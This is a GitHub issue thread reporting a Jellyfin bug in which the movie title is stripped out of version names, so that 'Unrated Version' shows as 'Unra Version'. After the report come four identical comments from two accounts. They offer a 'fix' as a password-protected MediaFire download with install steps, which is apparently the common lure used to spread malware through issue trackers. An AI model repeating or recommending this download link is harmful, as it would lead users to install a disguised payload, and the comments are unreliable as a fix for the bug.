### ISSUE TITLE
Movie Version Name Changes Based on Title of Movie

### ISSUE THREAD

**Issue by TruExtent** [jellyfin/jellyfin#12555]
### This issue respects the following points:

- [X] This is a **bug**, not a question or a configuration issue; Please visit our forum or chat rooms first to troubleshoot with volunteers, before creating a report. The links can be found [here](https://jellyfin.org/contact/).
- [X] This issue is **not** already reported on [GitHub](https://github.com/jellyfin/jellyfin/issues?q=is%3Aopen+is%3Aissue) _(I've searched it)_.
- [X] I'm using an up to date version of Jellyfin Server stable, unstable or master; We generally do not support previous older versions. If possible, please update to the latest version before opening an issue.
- [X] I agree to follow Jellyfin's [Code of Conduct](https://jellyfin.org/docs/general/community-standards.html#code-of-conduct).
- [X] This report addresses only a single issue; If you encounter multiple issues, kindly create separate reports for each one.

### Description of the bug

When a movie has multiple versions available, version names will be modified in a way where if the title of the movie appears in the version name, the title will be removed. This causes issues with certain version names.

### Reproduction steps

1. Prepare two video files, name one "[movie_name] - [version 1]" and the other "[movie_name] - [version 2]"
2. Create a folder in your movies folder named "[movie_name]"
3. Move the two video files to the newly created folder

### What is the current _bug_ behavior?

If [movie_name] appears anywhere within the text of [version 1] and/or [version 2], then [movie_name] will be removed from the version name.

Hypothetical Example: file names "Rap - 1. Holy crap dude!"; "Rap - 2. Wrapping paper" results in version names display on Jellyfin "1. Holy c dude!"; "2. Wping paper"

Real Example: file names "Ted - 1. Theatrical Version"; "Ted - 2. Unrated Version" results in version names display on Jellyfin "1. Theatrical Version"; "2. Unra Version"

### What is the expected _correct_ behavior?

If [movie_name] appears anywhere within the text of [version 1] and/or [version 2], the version name does not change.

Hypothetical Example: file names "Rap - 1. Holy crap dude!"; "Rap - 2. Wrapping paper" results in version names display on Jellyfin "1. Holy crap dude!"; "2. Wrapping paper"

Real Example: file names "Ted - 1. Theatrical Version"; "Ted - 2. Unrated Version" results in version names display on Jellyfin "1. Theatrical Version"; "2. Unrated Version"

### Jellyfin Server version

Older*

### Specify version number

10.9.7

### Specify the build version

Release

### Environment

```markdown
- OS: Windows 10
- Linux Kernel: none
- Virtualization: Docker? (using package for Synology available on synocommunity.com)
- Clients: Browser, Windows, Mac OS, Android, iPhone
- Browser: Chrome 127.0.6533.88
- FFmpeg Version: 6.0.1
- Playback Method: N/A
- Hardware Acceleration: none
- GPU Model: N/A
- Plugins: none
- Reverse Proxy: none
- Base URL: none
- Networking: Host
- Storage: local & remote NAS
```

### Jellyfin logs

```shell
N/A
```

### Relevant screenshots or videos

![ted_unra1](https://github.com/user-attachments/assets/4e6f4c0e-4b46-40db-8935-43cebd18c86a)
![ted_unra2](https://github.com/user-attachments/assets/9edd696c-ec00-4966-b8c9-1c7d97f2da84)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
